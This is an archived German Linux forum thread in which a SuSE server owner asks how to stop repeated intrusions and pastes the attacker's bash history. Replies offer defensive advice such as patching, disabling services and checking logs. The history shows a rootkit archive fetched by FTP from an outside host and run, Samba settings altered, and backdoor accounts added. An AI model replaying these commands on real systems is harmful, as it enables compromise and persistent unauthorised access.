PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Merkwürdige Logins



th.henkel
14.09.03, 19:48
Hallo zusammen,

da sagt man, dass Linux eines der sichersten Systeme ist und dann sowas.

Ich nutze seit einigen Jahren Linux als Serversystem für verschiedene CLients. Letztes Jahr bin ich wegen T-DSL auf Suse 7.3 Professional umgestiegen. Seit ca. 2 Monaten habe ich Sicherheitsprobleme, obwohl eine Firewall alle ankommenden Verbindungen ablehnt (PersonalFirewall) und die IP durch Neueinwahl oft wechselt. Ich route über IPforwarding einige Cleints (Windoof) ins Netz.

Iregendwelche Idioten loggen sich trotzdem auf meinen Server ein und können dort Benutzer anlegen SambaKonfig verändern und und und.

Ich habe bereits zum dritten mal neuistalliert und vertraue nur noch meinen original CDs. Tortzdem gelingt es denen immer wieder Zugriff zu erlagen. Dass ich alle Benutzer jedesmal verändert habe (Name und Psswd) ist selbstverstänlich.

Der letzte Angriff hat in der Bash History folgende Zeilen hinterlassen (die verwischen nicht mal ihre Spuren):

> ftp wasyu-kirik.webstrikesolutions.com
> tar -zxvf resikroot.tar.gz
> rm -rf resikroot.tar.gz
> cd clean
> rem root
> cd
> cd /etc/samba
> pico smb.conf
> /etc/init.d/smb restart
> /etc/init.d/smb stop
> /etc/init.d/smb start
> cd
> passwd news
> logout
> useradd http
> passwd http
> logout
> passwd http
> logout
> ftp wasyu-kirik.webstrikesolutions.com
> pico smb.conf
> logout
> exit

Wer kann mir helfen. Wie schütze ich mich besser?

Vielen Dank im Voraus

emba
14.09.03, 20:32
:D

vllt. solltest du es mal mit patchen installierter software bzw. beenden unbenötigter dienste versuchen
da kannst du 1000 mal deine cd´s wieder einspielen - die lücke besteht immer noch

aja:


da sagt man, dass Linux eines der sichersten Systeme ist und dann sowas
jedes sys ist nur so sicher, wie das (halb-)wissen des admin erlaubt ;)

greez

steve-bracket
15.09.03, 07:49
Eine Personal Firewall unter Linux ? Was meinst du damit? IPTables ?
Vielleicht kommt der "Angreifer" nicht von extern, sondern vom internen LAN ?

Am besten eine aktuelle Version der Distribution installieren und immer die Updates einspielen (soweit möglich).

Falls Versionsseitig nicht die neusten Dienste benötigt werden würde ich Debian vorschlagen. Diese Software ist sehr sicher.


Gruß
Steve

Temp
15.09.03, 08:20
schaug halt mal wo die jungs herkamen...

Und ähm sicherheitsupdates sind das A und O !!!!

Darum nehm ich für sowas net SuSe da macht das keinen spaß zum patchen.

Bei debian schon ;)

Gruß Temp

steve-bracket
15.09.03, 09:16
Original geschrieben von Temp
schaug halt mal wo die jungs herkamen...

Und ähm sicherheitsupdates sind das A und O !!!!

Darum nehm ich für sowas net SuSe da macht das keinen spaß zum patchen.

Bei debian schon ;)

Gruß Temp

Ne, bei SuSE gibt es ebenfalls ein nettes CommandLine Tool für Programmupdates.
Nennt sich "fou4s".
Und eine SuSE oder RedHat ist auch recht nett.

Gruß

real-challo
15.09.03, 09:19
Wenn Du mit Personal Firewall die Firewall von SuSE meinst - wo du nur ports in einer Datei einträgst, und SuSE bastelt dir deine Firewall - kann ich dir nur davon abraten. Habe ich auch mal versucht. Bei einem Selbsttest war die Kiste - nach meiner Meinung - ziemlich offen. Seitdem bastele ich meine eigenen regeln. So weiss ich, wer was darf, und muss nicht auf andere Scripte vertrauen.

In den Logs sollstes Du doch sehen, von wo sie sich einloggen ... (intern / extern)

cane
15.09.03, 10:10
Ich würde a)
Webstrikesolutions per email benachrichtigen wann genau der Attacker die Datei von ihrem Server runtergeladen hat (könnte sein, dass Sie selber gehackt wurden...)

b)tun was der Rest empfohlen hat...